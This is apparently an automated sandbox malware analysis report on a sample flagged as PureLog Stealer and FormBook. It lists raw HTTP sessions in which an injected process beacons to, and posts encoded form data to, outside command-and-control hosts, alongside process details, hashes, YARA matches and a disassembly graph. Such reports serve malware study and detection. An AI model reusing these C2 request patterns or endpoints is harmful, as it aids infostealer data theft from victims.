                                                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                40192.168.2.450029217.160.0.200801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:45.630177975 CET508OUTGET /fqxx/?JZOtU=EQE6/f8JwKBVpYrOhw4vrtxv3XcBNO3b0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK38aa77s170gQvTYOFwikxrd70F79vmCfQ9/M=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:18:47.005672932 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 4545
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:46 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:47.005693913 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                                                                                                Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                                                                                                                Nov 29, 2024 09:18:47.005702972 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                                                                                                                Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                                                                                                                Nov 29, 2024 09:18:47.005810022 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                                                                                                                                Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                41192.168.2.450030154.70.82.246801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:53.525882006 CET793OUTPOST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 61 59 4c 69 59 66 56 67 52 56 30 47 43 65 2f 4e 47 42 5a 7a 2f 4c 37 55 73 32 53 2f 30 6a 62 62 2b 31 42 69 34 79 61 35 6b 69 34 65 32 72 4c 39 6a 32 31 72 2f 6f 37 67 42 58 59 6f 76 6d 33 37 44 49 76 2b 6f 6f 37 71 53 6c 45 44 42 70 6c 54 52 37 2b 2f 6b 52 59 77 2f 38 6d 4d 63 49 77 66 78 6b 67 30 4a 67 45 5a 49 34 66 7a 6d 59 39 49 49 4b 57 46 41 68 48 6f 44 62 65 6c 76 50 6d 69 54 2f 5a 78 6c 2b 74 41 70 62 46 65 71 50 47 67 55 79 76 67 76 34 54 34 37 36 78 36 5a 45 74 67 73 48 56 49 6c 4b 32 6a 58 4c 33 52 59 6f 6f 79 52 43 50 42 4b 45 46 66 62 75 72 70 30 58 6e 7a 67 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=9aYLiYfVgRV0GCe/NGBZz/L7Us2S/0jbb+1Bi4ya5ki4e2rL9j21r/o7gBXYovm37DIv+oo7qSlEDBplTR7+/kRYw/8mMcIwfxkg0JgEZI4fzmY9IIKWFAhHoDbelvPmiT/Zxl+tApbFeqPGgUyvgv4T476x6ZEtgsHVIlK2jXL3RYooyRCPBKEFfburp0Xnzg==


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                42192.168.2.450031154.70.82.246801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:56.180109978 CET813OUTPOST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 61 59 4c 69 59 66 56 67 52 56 30 48 6a 75 2f 4c 6c 70 5a 32 66 4c 34 61 4d 32 53 30 55 6a 66 62 2b 70 42 69 35 47 77 34 58 4b 34 64 58 62 4c 38 6e 69 31 73 2f 6f 37 76 52 57 51 6d 50 6d 2b 37 44 45 4e 2b 74 49 37 71 53 68 45 44 45 4e 6c 54 43 54 35 2f 30 52 47 75 66 38 6f 52 4d 49 77 66 78 6b 67 30 4a 64 76 5a 4c 49 66 7a 57 6f 39 49 74 32 56 4d 67 68 41 76 44 62 65 30 2f 50 71 69 54 2b 2b 78 6e 4b 48 41 71 7a 46 65 72 2f 47 75 68 53 6f 75 66 35 61 6c 4c 37 54 71 37 78 32 67 39 32 4c 4b 44 57 6e 68 7a 2f 4e 55 65 6c 79 6a 67 6a 59 54 4b 67 32 43 63 6e 66 6b 33 71 75 6f 6a 2f 46 61 33 56 73 72 51 6e 2b 4f 78 74 6c 76 55 6a 4e 45 71 73 3d
                                                                                                                                                                                Data Ascii: JZOtU=9aYLiYfVgRV0Hju/LlpZ2fL4aM2S0Ujfb+pBi5Gw4XK4dXbL8ni1s/o7vRWQmPm+7DEN+tI7qShEDENlTCT5/0RGuf8oRMIwfxkg0JdvZLIfzWo9It2VMghAvDbe0/PqiT++xnKHAqzFer/GuhSouf5alL7Tq7x2g92LKDWnhz/NUelyjgjYTKg2Ccnfk3quoj/Fa3VsrQn+OxtlvUjNEqs=


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                43192.168.2.450032154.70.82.246801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:58.840838909 CET10895OUTPOST /lqxd/ HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 39 61 59 4c 69 59 66 56 67 52 56 30 48 6a 75 2f 4c 6c 70 5a 32 66 4c 34 61 4d 32 53 30 55 6a 66 62 2b 70 42 69 35 47 77 34 58 53 34 65 6c 54 4c 39 41 65 31 74 2f 6f 37 70 68 57 52 6d 50 6e 73 37 44 4d 4a 2b 74 45 46 71 55 39 45 46 53 52 6c 45 44 54 35 30 30 52 47 6d 2f 38 6c 4d 63 49 41 66 78 55 6b 30 49 78 76 5a 4c 49 66 7a 56 67 39 42 59 4b 56 4b 67 68 48 6f 44 62 43 6c 76 4f 2f 69 54 32 45 78 6e 4f 39 41 62 54 46 65 4c 76 47 73 56 79 6f 6f 50 35 59 6b 4c 37 31 71 37 74 54 67 35 75 50 4b 44 4b 4e 68 30 58 4e 59 59 73 35 6d 6b 33 4d 46 5a 51 63 61 4d 50 70 6f 55 61 63 76 77 36 37 4c 69 56 72 2b 68 61 52 45 68 77 70 39 32 54 61 57 76 77 51 57 73 31 2b 38 4a 6b 70 4c 2f 32 47 51 5a 4f 5a 42 4d 4a 73 55 6f 6c 79 59 56 36 75 37 73 78 47 5a 4c 49 4d 7a 61 71 62 71 32 71 31 46 61 46 74 58 49 49 4b 76 6a 59 70 64 63 51 7a 72 78 6c 72 65 6e 41 6f 55 41 74 70 50 47 70 56 4b 42 68 66 4b 4e 6d 63 65 59 43 69 53 62 4c 58 76 43 6c 6a 39 49 30 7a 46 72 53 55 62 39 2b 65 62 33 72 74 6a 57 42 4d [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=9aYLiYfVgRV0Hju/LlpZ2fL4aM2S0Ujfb+pBi5Gw4XS4elTL9Ae1t/o7phWRmPns7DMJ+tEFqU9EFSRlEDT500RGm/8lMcIAfxUk0IxvZLIfzVg9BYKVKghHoDbClvO/iT2ExnO9AbTFeLvGsVyooP5YkL71q7tTg5uPKDKNh0XNYYs5mk3MFZQcaMPpoUacvw67LiVr+haREhwp92TaWvwQWs1+8JkpL/2GQZOZBMJsUolyYV6u7sxGZLIMzaqbq2q1FaFtXIIKvjYpdcQzrxlrenAoUAtpPGpVKBhfKNmceYCiSbLXvClj9I0zFrSUb9+eb3rtjWBMD/aABPjnDM+UoJfvc/fknTLuD0xxjfvL1RKOP4KLFK78pTc6I9lcEkdVmVNMORB70brku/U4pf6tvuTHDeldtyyhxiBiCpruj935i14v1DPHlCEigEq9Yt45Zg+PQ1o6GORoVyAqeoCSyxOSRY23gPbgIrE10JYGpXK9N/cNqFEccCP0JxwxYlxF1cNHlJ54tkNuw0bDxr1pog6giSHEc6+OiQNBePkJ/4RDzDb7Hc0SxN+FtG4z3nky5ZPi/b0gqrsjenLxUbpF2gfTOX2mNHf8os0C0bAWVXVDhW0co0IUtP3z8roK5bDfMD8qDGGfY4YNKiU6ueLcqbmnicf2i6ROQdMo7OahJN7VXv9YqVKqhwKj1FveHhwQTP91FvI9o+t4hSarEnMYsvLeJnuHpETL4alaHwzT14rfjHhI8gVTqijceRUbzoN/cu25CvKCSdH9Wacu0hXcNJ8IrqApkBE4V/1dyuoUt5boBR3jfiOd/c13rbssOWDZ0lyUOc+N/cYmuVWPn9DUyx0V4WcPMuhBOQCymMXBWIj+paTlGR57cB9kMWDZR58OflnhSwS8pZ8qYfgF2xs4dWh6yYAS40Hkks/XrJMRK/OzFI2DutA1BNNROhrL1RvyxBM/iX6B+3TbkAwXT2sM7rJLthrHXPWrf7ShVrg653 [TRUNCATED]


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                44192.168.2.450033154.70.82.246801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:19:01.511279106 CET513OUTGET /lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU= HTTP/1.1
                                                                                                                                                                                Host: www.conseilnsaftogo.org
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:19:03.384107113 CET468INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:19:03 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                Location: http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU=


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:03:15:02
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\specifications.exe"
                                                                                                                                                                                Imagebase:0xdb0000
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5 hash:8F233B98037A9F801C3977AFE32776A6
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:03:15:06
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\specifications.exe"
                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5 hash:8F233B98037A9F801C3977AFE32776A6
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:03:15:30
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe"
                                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:03:15:31
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                                                                                                                                                Imagebase:0xf60000
                                                                                                                                                                                File size:340'992 bytes
                                                                                                                                                                                MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:03:15:44
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe"
                                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:03:15:56
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:11.5%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:240
                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                  execution_graph 31941 a39e8a8 31942 a39ea33 31941->31942 31944 a39e8ce 31941->31944 31944->31942 31945 a399108 31944->31945 31946 a39eb28 PostMessageW 31945->31946 31947 a39eb94 31946->31947 31947->31944 31948 2fee418 31951 2fee510 31948->31951 31949 2fee427 31952 2fee521 31951->31952 31955 2fee544 31951->31955 31960 2feba60 31952->31960 31955->31949 31956 2fee53c 31956->31955 31957 2fee748 GetModuleHandleW 31956->31957 31958 2fee775 31957->31958 31958->31949 31961 2fee700 GetModuleHandleW 31960->31961 31963 2fee52c 31961->31963 31963->31955 31964 2fee7a8 31963->31964 31965 2feba60 GetModuleHandleW 31964->31965 31966 2fee7bc 31965->31966 31966->31956 31967 a0a6a70 31971 a0a6a98 31967->31971 31976 a0a6aa8 31967->31976 31968 a0a6a8f 31972 a0a6ab1 31971->31972 31981 a0a6aee 31972->31981 31986 a0a6af0 31972->31986 31973 a0a6ad6 31973->31968 31977 a0a6ab1 31976->31977 31979 a0a6aee DrawTextExW 31977->31979 31980 a0a6af0 DrawTextExW 31977->31980 31978 a0a6ad6 31978->31968 31979->31978 31980->31978 31982 a0a6af0 31981->31982 31983 a0a6b1a 31982->31983 31992 a0a7212 31982->31992 31997 a0a7220 31982->31997 31983->31973 31987 a0a6b2b 31986->31987 31988 a0a6b1a 31986->31988 31989 a0a6bb9 31987->31989 31990 a0a7212 DrawTextExW 31987->31990 31991 a0a7220 DrawTextExW 31987->31991 31988->31973 31989->31973 31990->31988 31991->31988 31993 a0a7220 31992->31993 31994 a0a734e 31993->31994 32002 a0a7928 31993->32002 32007 a0a7938 31993->32007 31994->31983 31998 a0a7248 31997->31998 31999 a0a734e 31998->31999 32000 a0a7928 DrawTextExW 31998->32000 32001 a0a7938 DrawTextExW 31998->32001 31999->31983 32000->31999 32001->31999 32003 a0a794e 32002->32003 32012 a0a7d58 32003->32012 32016 a0a7d49 32003->32016 32004 a0a79c4 32004->31994 32008 a0a794e 32007->32008 32010 a0a7d58 DrawTextExW 32008->32010 32011 a0a7d49 DrawTextExW 32008->32011 32009 a0a79c4 32009->31994 32010->32009 32011->32009 32021 a0a7d98 32012->32021 32026 a0a7d89 32012->32026 